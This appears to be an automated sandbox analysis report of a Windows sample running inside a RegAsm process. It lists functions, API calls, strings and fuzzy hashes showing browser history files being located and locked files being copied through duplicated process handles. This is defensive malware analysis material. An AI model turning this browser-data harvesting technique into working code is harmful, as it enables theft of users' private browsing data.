Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99

Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E60F
memset.MSVCRT ref: 0040E629

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 2887208581-2114579845
Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998

Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?), ref: 004148C3
SizeofResource.KERNEL32(?,00000000), ref: 004148D4
LoadResource.KERNEL32(?,00000000), ref: 004148E4
LockResource.KERNEL32(00000000), ref: 004148EF

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688

Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0044DF01
??3@YAXPAX@Z.MSVCRT ref: 0044DF11
??3@YAXPAX@Z.MSVCRT ref: 0044DF21
??3@YAXPAX@Z.MSVCRT ref: 0044DF31

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D

Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043AA3D
memset.MSVCRT ref: 0043AE4A

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96

Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00444BA5

Strings

$, xrefs: 00444B80
8, xrefs: 00444B72

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: $$8
API String ID: 1475443563-435121686
Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69

Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E

CloseHandle.KERNEL32(000000FF), ref: 0040E582

Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC

DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
CloseHandle.KERNEL32(000000FF), ref: 0040E5CA

Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
String ID:
API String ID: 2722907921-0
Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58

Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70

memset.MSVCRT ref: 00403A55

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F

Strings

history.dat, xrefs: 00403A5E
places.sqlite, xrefs: 00403A9E

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
String ID: history.dat$places.sqlite
API String ID: 3093078384-467022611
Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69

Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
GetLastError.KERNEL32 ref: 00417627

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA

Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

*.*, xrefs: 0040C1FE
index.dat, xrefs: 0040C237

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FileFindFirst
String ID: *.*$index.dat
API String ID: 1974802433-2863569691
Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A

Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00409A10
memcpy.MSVCRT ref: 00409A28
??3@YAXPAX@Z.MSVCRT ref: 00409A31

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@mallocmemcpy
String ID:
API String ID: 3831604043-0
Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58

Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
GetLastError.KERNEL32 ref: 004175A2
GetLastError.KERNEL32 ref: 004175A8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8

Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
CloseHandle.KERNEL32(00000000), ref: 0040A061

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665

Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8

Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 004175D0
CloseHandle.KERNEL32(?), ref: 004175D9

Strings

}A, xrefs: 004175B9

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CloseHandleSleep
String ID: }A
API String ID: 252777609-2138825249
Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524

Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041EF80

Strings

BINARY, xrefs: 0041EEDE

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9

Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884

_mbscpy.MSVCRT ref: 00405250
_mbscat.MSVCRT ref: 0040525B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
String ID:
API String ID: 568699880-0
Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D

Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004126DB

Strings

/stext, xrefs: 004126D6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95

Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
CloseHandle.KERNEL32(00000000), ref: 0040957A

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$??2@CloseCreateHandleReadSize
String ID:
API String ID: 1023896661-0
Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58

Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88

CloseHandle.KERNEL32(?), ref: 0040CC98

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
String ID:
API String ID: 2445788494-0
Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5

Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041BDDF
memcmp.MSVCRT ref: 0041BDF1

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99

Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0

GetStdHandle.KERNEL32(000000F5), ref: 00410530
CloseHandle.KERNEL32(?), ref: 00410654

Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
String ID:
API String ID: 1381354015-0
Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59

Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60

Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55

Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 2154303073-0
Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95

Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

